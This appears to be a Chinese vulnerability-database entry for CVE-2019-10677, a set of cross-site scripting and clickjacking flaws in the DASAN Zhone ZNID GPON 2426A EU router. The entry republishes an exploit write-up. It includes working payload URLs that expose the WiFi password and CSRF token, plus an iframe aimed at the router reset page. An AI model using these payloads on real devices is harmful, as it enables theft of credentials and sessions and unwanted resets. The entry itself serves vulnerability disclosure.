DASAN Zhone ZNID GPON 2426A EU 跨站脚本漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1728844 漏洞类型 跨站脚本
发布时间 2019-09-05 更新时间 2019-09-10
CVE编号 CVE-2019-10677 CNNVD-ID CNNVD-201909-178
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019090032
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201909-178
|漏洞详情
DASAN Zhone ZNID GPON 2426A EU是韩国DASAN公司的一款无线路由器。 DASAN Zhone ZNID GPON 2426A EU S3.1.285及之前版本中存在跨站脚本漏洞。该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。
|漏洞EXP
Multiple Cross-Site Scripting (XSS) in the web interface of DASAN Zhone ZNID GPON 2426A EU version S3.1.285 application allows a remote attacker to execute arbitrary JavaScript via manipulation of an unsanitized GET parameters.

# Exploit Title: Multiple Cross-Site Scripting (XSS) in DASAN Zhone ZNID GPON 2426A EU

# Date: 31.03.2019

# Exploit Author: Adam Ziaja https://adamziaja.com https://redteam.pl

# Vendor Homepage: https://dasanzhone.com

# Version: <= S3.1.285

# Alternate Version: <= S3.0.738

# Tested on: version S3.1.285 (alternate version S3.0.738)

# CVE : CVE-2019-10677


= Reflected Cross-Site Scripting (XSS) =

http://192.168.1.1/zhndnsdisplay.cmd?fileKey=&name=%3Cscript%3Ealert(1)%3C/script%3E&interface=eth0.v1685.ppp


= Stored Cross-Site Scripting (XSS) =

* WiFi network plaintext password

http://192.168.1.1/wlsecrefresh.wl?wl_wsc_reg=%27;alert(wpaPskKey);//

http://192.168.1.1/wlsecrefresh.wl?wlWscCfgMethod=';alert(wpaPskKey);//

* CSRF token

http://192.168.1.1/wlsecrefresh.wl?wlWscCfgMethod=';alert(sessionKey);//


= Clickjacking =

<html><body><iframe src="http://192.168.1.1/resetrouter.html"></iframe></body></html>
|参考资料

来源:www.exploit-db.com

链接:https://www.exploit-db.com/exploits/47351


来源:packetstormsecurity.com

链接:https://packetstormsecurity.com/files/154357/DASAN-Zhone-ZNID-GPON-2426A-EU-Cross-Site-Scripting.html